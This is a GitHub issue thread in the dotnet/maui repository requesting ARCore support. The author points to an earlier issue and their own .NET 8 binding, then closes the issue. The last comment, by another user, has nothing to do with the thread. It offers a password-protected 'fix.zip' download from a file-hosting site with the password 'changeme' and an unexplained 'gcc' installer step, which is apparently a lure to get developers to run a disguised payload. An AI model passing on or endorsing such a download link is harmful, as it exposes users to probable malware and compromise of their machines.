### ISSUE TITLE
Support for ARCore

### ISSUE THREAD

**Issue by softlion** [dotnet/maui#24435]
### Description

In this [thread](https://github.com/dotnet/maui/issues/16623) they ask support for ARCore.

I rewrote that binding for net8 there: https://github.com/vapolia/GoogleARCore.Dotnet.Binding

### Public API Changes

ARCore SDK

### Intended Use-Case

ARCore

**Comment by softlion** [comment]
That was to ref the existing issue. Closing.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
